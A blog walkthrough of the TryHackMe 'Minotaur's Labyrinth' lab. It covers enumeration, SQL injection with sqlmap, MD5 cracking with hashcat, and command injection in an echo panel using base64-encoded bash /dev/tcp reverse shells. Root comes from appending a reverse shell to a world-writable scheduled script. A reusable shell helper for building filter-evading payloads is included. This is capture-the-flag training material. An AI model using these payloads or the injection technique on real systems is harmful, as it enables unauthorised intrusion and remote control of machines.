narancs's blog

TryHackMe – Minotaur’s Labyrinth walkthrough

Introduction

THM Minotaur's Labyrinth room logo

Minotaur’s Labyrinth is a medium difficulty room on TryHackMe with 4 flags to find. The first flag is found by enumeration, the second is behind the web application's admin login, and the user and root flags come from getting a shell on the target machine and escalating privileges.

Enumeration

Note: I added the IP address of the VM to /etc/hosts as labyrinth.thm, so I don’t have to type the IP every time.

Nmap scan results:

Nmap found 4 open ports:

  • FTP is running on port 21, and anonymous FTP login is allowed.
  • Apache webserver is running on port 80 (HTTP) and port 443 (HTTPS).
  • MariaDB is running on port 3306, but it refuses connections from our host.

Enumerating FTP

We can log in to FTP as the anonymous user; no password is required.

We can find 3 files on the FTP server.

  • flag.txt contains the first flag
  • Content of message.txt:
    • Daedalus is a clumsy person, he forgets a lot of things arount the labyrinth, have a look around, maybe you’ll find something 🙂
      — Minotaur
  • Content of keep_in_mind.txt
    • Not to forget, he forgets a lot of stuff, that’s why he likes to keep things on a timer … literally
      — Minotaur

After that I moved on to enumerate the website.

Enumerating the website

I visited the website running on port 80.

It is a login page with 2 other options besides logging in:

  • Forgot password?: shows a popup with the following message:
    • Ye …. Thought it would be this easy?
  • Click here for root flag: redirects to /jebait.html

As none of these was helpful, I also tried basic SQL injection on the login form. That did not work either, so I used gobuster to enumerate additional files and directories.

When I first ran gobuster, I received an error, because the server answers every non-existent URL with a 302 redirect:

Error: the server returns a status code that matches the provided options for non existing urls. http://labyrinth.thm/05f2ae4b-982c-4bbd-ad0a-ac4ced6f54eb => 302 (Length: 3562). To continue please exclude the status code, the length or use the --wildcard switch

I blacklisted the status code 302 (-b 302), and then it worked fine:

gobuster dir --url http://labyrinth.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32 -b 302

I found an interesting file in the /js directory: login.js. It contains a pwdgen() function and a comment that shows how to build the password for the Daedalus user!

function pwdgen() {
    a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
    b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
    c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
}
//pwd gen for Daedalus a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8]

We can run the following 4 lines in the browser's JavaScript console to get the password for the Daedalus user:

a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8]

The password for Daedalus is g2e55kh4ck5r. Checking the other directories found by gobuster, I noticed the same credentials in /logs/post/post_log.log as well: a logged POST request to /minotaur/minotaur-box/login.php with the body email=Daedalus&password=g2e55kh4ck5r.

With this information we can log in at /login.html.

Exploitation

Finding the administrator's password and the second flag

There is an input field on the page where we can search for People or Creatures. In the page source there is a comment above the input:

<!-- Minotaur!!! Told you not to keep permissions in the same shelf as all the others especially if the permission is equal to admin -->

I searched for the Daedalus user in the People table and the result showed the user's password hash. Then I tried to find the administrator's hash by searching for ‘Admin’, ‘Administrator’, ‘Minotaur’, etc., but got no results.

After that I tried SQL injection in the input field. I used Burp Suite to capture a search request and saved it to a file called search.req.

Then I let sqlmap find the injection point from the saved request and dump the contents of the database:

sqlmap -r search.req --dump

The results:

Table: people
[5 entries]
+----------+--------------+----------------------------------+------------------+
| idPeople | namePeople   | passwordPeople                   | permissionPeople |
+----------+--------------+----------------------------------+------------------+
| 1        | Eurycliedes  | 42354020b68c7ed28dcdeabd5a2baf8e | user             |
| 2        | Menekrates   | 0b3bebe266a81fbfaa79db1604c4e67f | user             |
| 3        | Philostratos | b83f966a6f5a9cff9c6e1c52b0aa635b | user             |
| 4        | Daedalus     | b8e4c23686a3a12476ad7779e35f5eb6 | user             |
| 5        | M!n0taur     | 1765db9457f496a39859209ee81fbda4 | admin            |
+----------+--------------+----------------------------------+------------------+
Table: creatures
[4 entries]
+------------+--------------+----------------------------------+--------------------+
| idCreature | nameCreature | passwordCreature                 | permissionCreature |
+------------+--------------+----------------------------------+--------------------+
| 1          | Cerberos     | 3898e56bf6fa6ddfc3c0977c514a65a8 | user               |
| 2          | Pegasus      | 5d20441c392b68c61592b2159990abfe | user               |
| 3          | Chiron       | f847149233ae29ec0e1fcf052930c044 | user               |
| 4          | Centaurus    | ea5540126c33fe653bf56e7a686b1770 | user               |
+------------+--------------+----------------------------------+--------------------+

We can see that the user M!n0taur has admin permissions, and we have the user's password hash. The hashes are 32 hex characters, which points to unsalted MD5, so I cracked it with hashcat in mode 0 (MD5) against rockyou:

hashcat -a 0 -m 0 1765db9457f496a39859209ee81fbda4 /usr/share/wordlists/rockyou.txt --quiet

Now we can log in as M!n0taur with the cracked password. This gives us access to 2 more menu items on the page; one of them contains the second flag.

Finding the user flag

The other menu item we now have access to is called ‘Secret_Stuff’. It redirects us to the /echo.php page, which shows an ‘echo-pannel’.

If I type ‘test’ into the input, it shows up twice on the page, which suggests the backend runs the echo command with our input and prints the result. So I started experimenting with chaining other commands after the echo. Some special characters (e.g. ; and &) are disallowed, but the | character works, so if I type

| ls -l

I get the following output:

total 68
drwxr-xr-x 4 root root 4096 jún   20  2021 api
drwxr-xr-x 2 root root 4096 jún   20  2021 css
-rw-r--r-- 1 root root  322 jún   20  2021 dbConnect.php
-rw-r--r-- 1 root root 2739 okt   11  2021 echo.php
-rw-r--r-- 1 root root 1369 jún   20  2021 favicon.png
drwxr-xr-x 2 root root 4096 jún   20  2021 imgs
-rw-r--r-- 1 root root 4571 jún   20  2021 index.php
-rw-r--r-- 1 root root 1340 jún   20  2021 jebait.html
drwxr-xr-x 2 root root 4096 jún   20  2021 js
-rw-r--r-- 1 root root 2485 jún   20  2021 login.html
-rw-r--r-- 1 root root  865 jún   20  2021 login.php
-rw-r--r-- 1 root root   84 jún   20  2021 logout.php
drwxr-xr-x 3 root root 4096 okt   11  2021 logs
-rw-r--r-- 1 root root   20 jún   20  2021 README.md
-rw-r--r-- 1 root root  333 jún   20  2021 session2.php
-rw-r--r-- 1 root root  282 jún   20  2021 session.php

We can also read files with the cat command, for example echo.php itself, to see exactly which characters its filter rejects. From this point we can get a reverse shell on the target machine: base64-encode the reverse shell payload, pipe the string into the base64 -d command, and pipe the decoded command into bash to execute it.

Reverse shell payload. Base64 adds = padding unless the input length is a multiple of 3 bytes, and = is one of the rejected characters, so I added some extra space characters to the command to make its length (including the trailing newline) divisible by 3:

/bin/bash -l > /dev/tcp/10.11.56.129/1234 0<&1   2>&1

Base64 encoded:

L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTEuNTYuMTI5LzEyMzQgMDwmMSAgIDI+JjEK

Final command to run in the echo-panel (with a listener such as nc -lvnp 1234 already running on 10.11.56.129):

L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTEuNTYuMTI5LzEyMzQgMDwmMSAgIDI+JjEK | base64 -d | bash

We received a shell as daemon user. The user flag is in /home/user/flag.txt.
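The padding trick above is easy to get wrong by hand, so here is an added example (my own helper script, not code from the room or from the original post) that pads the command, encodes it, and refuses to emit a payload containing a character the filter would drop. The blocked set ';&=' is an assumption based on what the echo-panel rejected in this room; the real list is in echo.php on the target, and the listener IP is the attacker's.

```shell
#!/bin/bash
# Added example: build a "<base64> | base64 -d | bash" payload for a
# command-injection sink that rejects certain characters. Padding the
# command with spaces so that its length (plus the trailing newline) is a
# multiple of 3 means the base64 output needs no '=' padding.
#
# Assumed filter, based on what the echo-panel rejected in this room:
# ';', '&' and '='. The real list lives in echo.php on the target.
DEFAULT_BLOCKED=';&='

# build_payload CMD [BLOCKED_CHARS]
# Prints the payload to paste into the echo-panel, or fails if it would
# contain a blocked character (e.g. if '+' or '/' were filtered as well).
build_payload() {
    local cmd="$1" blocked pad spaces b64 payload
    blocked="${2:-$DEFAULT_BLOCKED}"
    # spaces needed so that (length of cmd + 1 for the newline) % 3 == 0
    pad=$(( (3 - ((${#cmd} + 1) % 3)) % 3 ))
    spaces=''
    while [ "$pad" -gt 0 ]; do
        spaces="$spaces "
        pad=$((pad - 1))
    done
    b64=$(printf '%s%s\n' "$cmd" "$spaces" | base64 | tr -d '\n')
    payload="$b64 | base64 -d | bash"
    if printf '%s' "$payload" | grep -q "[$blocked]"; then
        echo "payload contains a blocked character from [$blocked]" >&2
        return 1
    fi
    printf '%s\n' "$payload"
}

# decode_payload PAYLOAD
# Shows exactly what `base64 -d` hands to bash on the target.
decode_payload() {
    printf '%s' "${1%% | *}" | base64 -d
}

# usage (the reverse shell from the walkthrough; the IP is the attacker's):
# build_payload '/bin/bash -l > /dev/tcp/10.11.56.129/1234 0<&1 2>&1'
```

Run build_payload with the one-space version of the command and it adds the two spaces itself; with the three-space version from the walkthrough it reproduces the exact string shown above. If the target also filtered + or / (both are part of the base64 alphabet), the check fails loudly instead of producing a payload that silently dies in the filter.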

Finding the root flag

I found 2 interesting directories in /: /reminders and /timers. In the /timers directory there is a world-writable (777) script called timer.sh:

#!/bin/bash
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt

Judging by the length of dontforget.txt, this script is executed very frequently, presumably by a scheduled job (this is what the "keep things on a timer" hint from keep_in_mind.txt was about). We can simply append a reverse shell to timer.sh, start a listener on port 4444, wait for the next run, and receive a shell as root:

echo -n '/bin/bash -l > /dev/tcp/10.11.56.129/4444 0<&1 2>&1' >> /timers/timer.sh

One thing to check before appending: if the script does not end with a newline, the appended text is glued onto the existing echo line and breaks it, so in that case start the payload with a newline (tail -c1 /timers/timer.sh shows the last byte).

Once we receive the root shell, we can find the flag in the /root/da_king_flek.txt file.
